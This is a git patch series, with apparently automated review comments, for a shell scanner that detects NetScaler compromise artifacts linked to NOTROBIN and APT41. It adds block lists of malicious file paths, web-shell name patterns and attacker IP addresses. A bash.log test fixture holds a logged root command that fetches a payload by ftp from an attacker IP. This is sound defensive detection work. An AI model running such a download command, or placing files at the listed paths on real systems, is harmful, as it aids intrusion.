From 85d36ed9a23ef325a8a50b1b84e01a4a1af175c6 Mon Sep 17 00:00:00 2001
From: William Ballenthin
Date: Tue, 24 Mar 2020 22:35:11 -0600
Subject: [PATCH 1/3] scanner: fs: add artifacts from upcoming blog post
---
 scanners/fs-paths.sh | 41 +++++++++++++++++++++++++++++++
 scanners/netscaler-content.sh | 1 +
 tests/file-system/apt41/.test | 0
 tests/file-system/apt41/tmp/bsd | 0
 tests/file-system/apt41/tmp/un | 0
 5 files changed, 42 insertions(+)
 create mode 100644 tests/file-system/apt41/.test
 create mode 100644 tests/file-system/apt41/tmp/bsd
 create mode 100644 tests/file-system/apt41/tmp/un
diff --git a/scanners/fs-paths.sh b/scanners/fs-paths.sh
index f831303..93e30e7 100644
--- a/scanners/fs-paths.sh
+++ b/scanners/fs-paths.sh
@@ -14,6 +14,9 @@ scan_fs_notrobin() {
 declare -a notrobin_paths;
 notrobin_paths[0]="/var/nstmp/.nscache/httpd";
 notrobin_paths[1]="/tmp/.init/httpd";
+ # from subsequent post
+ notrobin_paths[2]="/var/nstmp/.nscache/prev.sh";
+ notrobin_paths[3]="/var/nstmp/.nscache/httpd-nscache_clean";
 local found=false;
 for notrobin_path in "${notrobin_paths[@]}"; do
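Review bot: The comment `# from subsequent post` above `notrobin_paths[2]` names no source, so a reader cannot tell which publication these two paths came from or why they count as NOTROBIN indicators. The third patch in this series attributes its entries to FireEye, so a comment such as `# additional NOTROBIN paths from the follow-up FireEye blog post` would keep the two files in step. scan_fs_notrobin's body continues outside the hunk, including the loop that consumes these entries.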
@@ -45,11 +48,49 @@ scan_fs_isc_paths() {
 if [ "$found" != true ]; then
 debug "did not find artifact enumerated by SANS ISC";
 fi
+}
+
+scan_fs_apt41() {
+ declare -a paths;
+ paths[0]="/tmp/bsd";
+ paths[1]="/tmp/un";
+
+ local found=false;
+ for path in "${paths[@]}"; do
+ if [ -f "$root_directory/$path" ]; then
+ found=true;
+ report_match "$path, known path to post-exploitation artifact.";
+ fi
+ done
+ if [ "$found" != true ]; then
+ debug "did not find file system artifact";
+ fi
+}
+
+scan_fs_other_paths() {
+ declare -a paths;
+ paths[0]="/vpn/themes/imgs/tiny.php";
+ paths[1]="/vpn/themes/imgs/debug.php";
+ paths[2]="/vpn/themes/imgs/conn.php";
+
+ local found=false;
+ for path in "${paths[@]}"; do
+ if [ -f "$root_directory/$path" ]; then
+ found=true;
+ report_match "$path, known path to post-exploitation artifact.";
+ fi
+ done
+
+ if [ "$found" != true ]; then
+ debug "did not find file system artifact";
+ fi
 }
 scan_fs_known_paths() {
 scan_fs_netscalerd;
 scan_fs_notrobin;
 scan_fs_isc_paths;
+ scan_fs_apt41;
+ scan_fs_other_paths;
 }
diff --git a/scanners/netscaler-content.sh b/scanners/netscaler-content.sh
index e4345f9..4ab9780 100644
--- a/scanners/netscaler-content.sh
+++ b/scanners/netscaler-content.sh
@@ -59,6 +59,7 @@ ns_exploit_dirs[1]="/netscaler/portal/scripts/";
 ns_exploit_dirs[2]="/var/vpn/bookmark/";
 ns_exploit_dirs[3]="/var/tmp/netscaler/portal/templates/";
 ns_exploit_dirs[4]="/var/vpn/themes/";
+ns_exploit_dirs[5]="/var/vpn/theme/";
 # custom output formatting for matches.
 # if the filename ends with .xml print the whole file,
diff --git a/tests/file-system/apt41/.test b/tests/file-system/apt41/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/apt41/tmp/bsd b/tests/file-system/apt41/tmp/bsd
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/apt41/tmp/un b/tests/file-system/apt41/tmp/un
new file mode 100644
index 0000000..e69de29
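Review bot: scan_fs_apt41 and scan_fs_other_paths repeat the same declare/loop/report/debug body line for line, and both emit the same generic strings, `report_match "$path, known path to post-exploitation artifact."` and `debug "did not find file system artifact"`, so unlike the NOTROBIN and SANS ISC messages immediately above, neither a match nor a miss says which indicator list it belongs to. A small helper that takes a label and the path list removes the duplication and carries the label into both messages; each scanner then becomes a one-line call. The name scan_fs_other_paths also says nothing about what the three `/vpn/themes/imgs/` entries are, so the label passed to the helper (and ideally the function name) should state their source.
```shell
# report_match every path in "$@" that exists under $root_directory;
# "$1" names the indicator family so matches and misses are attributable.
_scan_fs_path_list() {
    local label="$1"; shift;
    local found=false;
    for path in "$@"; do
        if [ -f "$root_directory/$path" ]; then
            found=true;
            report_match "$path, known path to $label artifact.";
        fi
    done
    if [ "$found" != true ]; then
        debug "did not find $label artifacts";
    fi
}

scan_fs_apt41() {
    _scan_fs_path_list "APT41" "/tmp/bsd" "/tmp/un";
}

# … unchanged: scan_fs_other_paths becomes the same one-line call with its own label; scan_fs_known_paths …
```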
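Review bot: `ns_exploit_dirs[5]="/var/vpn/theme/"` sits directly under `[4]="/var/vpn/themes/"` and reads like a typo of it; the second patch in this series adds both spellings to fs-paths.sh and a fixture under `var/vpn/theme/`, so the singular appears deliberate and deserves a comment such as `# "theme" (singular) is a separate directory from "themes" above, not a typo`. The enclosing array declaration starts outside the hunk.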
From 6c590fe15c2888d12afa7f650ae4349ee8e3c6f3 Mon Sep 17 00:00:00 2001
From: William Ballenthin
Date: Tue, 24 Mar 2020 22:53:13 -0600
Subject: [PATCH 2/3] scanners: fs: add additional NOTROBIN artifacts from upcoming blog
---
 scanners/fs-paths.sh | 20 ++++++++++++++++++++
 .../notrobin-var-vpn-theme-random/.test | 0
 .../aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php | 0
 .../notrobin-var-vpn-theme-y/.test | 0
 .../aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl | 0
 5 files changed, 20 insertions(+)
 create mode 100644 tests/file-system/notrobin-var-vpn-theme-random/.test
 create mode 100644 tests/file-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php
 create mode 100644 tests/file-system/notrobin-var-vpn-theme-y/.test
 create mode 100644 tests/file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl
diff --git a/scanners/fs-paths.sh b/scanners/fs-paths.sh
index 93e30e7..51f5753 100644
--- a/scanners/fs-paths.sh
+++ b/scanners/fs-paths.sh
@@ -26,6 +26,26 @@ scan_fs_notrobin() {
 fi
 done
+ declare -a dirs;
+ dirs[0]="/var/vpn/theme";
+ dirs[1]="/var/vpn/themes";
+
+ declare -a blacklist;
+ blacklist[0]="[a-f0-9]\{32\}\.php";
+ blacklist[1]="[a-f0-9]\{32\}_[a-zA-Z0-9]\{1,12\}\.\(php\|pl\)";
+
+ for dir in "${dirs[@]}"; do
+ if [ -d "$root_directory/$dir" ]; then
+ for blackterm in "${blacklist[@]}"; do
+ local entries=$(ls "$root_directory/$dir" | grep "$blackterm");
+ if [ -n "$entries" ]; then
+ found=true;
+ report_match "$entries, known path to NOTROBIN artifact.";
+ fi
+ done
+ fi
+ done
+
 if [ "$found" != true ]; then
 debug "did not find NOTROBIN artifacts";
 fi
diff --git a/tests/file-system/notrobin-var-vpn-theme-random/.test b/tests/file-system/notrobin-var-vpn-theme-random/.test
new file mode 100644
index 0000000..e69de29
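Review bot: `local entries=$(ls "$root_directory/$dir" | grep "$blackterm")` feeds whatever `grep` prints, possibly several newline-separated names, straight into one `report_match`, and the reported name lacks the `$dir` prefix that every other match in this function carries, so the output is neither one match per line nor a usable path. The two `blacklist` patterns are also unanchored, so `[a-f0-9]\{32\}\.php` fires on any name that merely contains such a substring, and `local var=$(cmd)` discards the pipeline's exit status. Iterating the directory with a glob, matching each basename against the anchored pattern and reporting `$dir/$name` addresses all three; separately, `\|` in `blacklist[1]` is a GNU BRE extension, which may matter if this scanner runs under a non-GNU grep. scan_fs_notrobin begins and ends outside this hunk.
```shell
    # … unchanged: dirs and blacklist declarations …
    for dir in "${dirs[@]}"; do
        if [ -d "$root_directory/$dir" ]; then
            for entry in "$root_directory/$dir"/*; do
                [ -e "$entry" ] || continue;   # empty directory: the glob is returned literally
                name="${entry##*/}";
                for blackterm in "${blacklist[@]}"; do
                    # anchor so the pattern must describe the whole file name
                    if printf '%s\n' "$name" | grep -q "^${blackterm}\$"; then
                        found=true;
                        report_match "$dir/$name, known path to NOTROBIN artifact.";
                        break;
                    fi
                done
            done
        fi
    done
    # … unchanged: "did not find NOTROBIN artifacts" debug …
```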
diff --git a/tests/file-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php b/tests/file-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/notrobin-var-vpn-theme-y/.test b/tests/file-system/notrobin-var-vpn-theme-y/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl b/tests/file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl
new file mode 100644
index 0000000..e69de29
From 897c994ac89e3e5a5a8c7a4c5dd537c604c5973a Mon Sep 17 00:00:00 2001
From: William Ballenthin
Date: Tue, 24 Mar 2020 23:00:14 -0600
Subject: [PATCH 3/3] scanners: shell history, content: add additional blacklisted terms from upcoming blog post
---
 scanners/netscaler-content.sh | 9 +++++++++
 scanners/shell-history.sh | 9 +++++++++
 tests/shell-history/bsd/.test | 0
 tests/shell-history/bsd/var/log/bash.log | 1 +
 4 files changed, 19 insertions(+)
 create mode 100644 tests/shell-history/bsd/.test
 create mode 100644 tests/shell-history/bsd/var/log/bash.log
diff --git a/scanners/netscaler-content.sh b/scanners/netscaler-content.sh
index 4ab9780..3627eb3 100644
--- a/scanners/netscaler-content.sh
+++ b/scanners/netscaler-content.sh
@@ -45,6 +45,15 @@ ns_content_blacklist[25]="198.44.227.126";
 ns_content_blacklist[26]="/tmp/l.sh";
 ns_content_blacklist[27]="Digest::MD5";
 ns_content_blacklist[28]="Could not execute command";
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+ns_content_blacklist[29]="/tmp/bsd";
+ns_content_blacklist[30]="/tmp/un";
+ns_content_blacklist[31]="66.42.98.220";
+ns_content_blacklist[32]="/var/nstmp/.nscache/prev.sh";
+ns_content_blacklist[33]="/var/nstmp/.nscache/httpd-nscache_clean";
+ns_content_blacklist[34]="/vpn/themes/imgs/tiny.php";
+ns_content_blacklist[35]="/vpn/themes/imgs/debug.php";
+ns_content_blacklist[36]="/vpn/themes/imgs/conn.php";
 declare -a ns_exploit_dirs;
 ns_exploit_dirs[0]="/netscaler/portal/templates/";
diff --git a/scanners/shell-history.sh b/scanners/shell-history.sh
index cb96e34..272f804 100644
--- a/scanners/shell-history.sh
+++ b/scanners/shell-history.sh
@@ -50,6 +50,15 @@ shell_history_blacklist[35]="157.157.87.22"
 shell_history_blacklist[36]="193.187.174.104"
 shell_history_blacklist[37]="62.113.112.33"
 shell_history_blacklist[38]="217.12.221.12"
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+shell_history_blacklist[39]="/tmp/bsd";
+shell_history_blacklist[40]="/tmp/un";
+shell_history_blacklist[41]="66.42.98.220";
+shell_history_blacklist[42]="/var/nstmp/.nscache/prev.sh";
+shell_history_blacklist[43]="/var/nstmp/.nscache/httpd-nscache_clean";
+shell_history_blacklist[44]="/vpn/themes/imgs/tiny.php";
+shell_history_blacklist[45]="/vpn/themes/imgs/debug.php";
+shell_history_blacklist[46]="/vpn/themes/imgs/conn.php";
 declare -a shell_history_paths;
 shell_history_paths[0]="/var/log/bash.log";
diff --git a/tests/shell-history/bsd/.test b/tests/shell-history/bsd/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/shell-history/bsd/var/log/bash.log b/tests/shell-history/bsd/var/log/bash.log
new file mode 100644
index 0000000..f410a30
--- /dev/null
+++ b/tests/shell-history/bsd/var/log/bash.log
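Review bot: The header comment `# from subsequent NOTROBIN and/or APT41 blog posts from FEYE` does not say which of `[29]` through `[36]` belongs to which report, while the earlier patches in this series do: `/tmp/bsd` and `/tmp/un` were added under scan_fs_apt41 and the `/var/nstmp/.nscache/` entries under scan_fs_notrobin, whereas the three `/vpn/themes/imgs/` files went into scan_fs_other_paths with no attribution at all. Splitting the comment, e.g. `# APT41, follow-up FireEye post` above `[29]` and `# NOTROBIN, follow-up FireEye post` above `[32]`, lets an analyst map a hit back to its source; `66.42.98.220` appears alongside `/tmp/bsd` in this patch's bash.log fixture, so it presumably belongs with the APT41 group. The same eight terms under the same comment are repeated in the shell-history.sh hunk of this patch, so the two lists will drift unless they are sourced from one place; whether the two scanners can share a list is not visible here.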
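Review bot: The added `shell_history_blacklist[39]` through `[46]` lines end with `;` while the surrounding entries (`[35]` through `[38]`) do not, so the block is visibly out of step with this file's style; drop the semicolons, e.g. `shell_history_blacklist[39]="/tmp/bsd"`. The attribution comment and the duplication with netscaler-content.sh are raised on that file's hunk.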
@@ -0,0 +1 @@
+Jan 19 24:26:52 ns bash[1297]: root on /dev/pts/0 shell_command="/usr/bin/ftp -o /tmp/bsd ftp://xxxxxxxxxxxxxxxxxxxxxx66.42.98.220/bsd"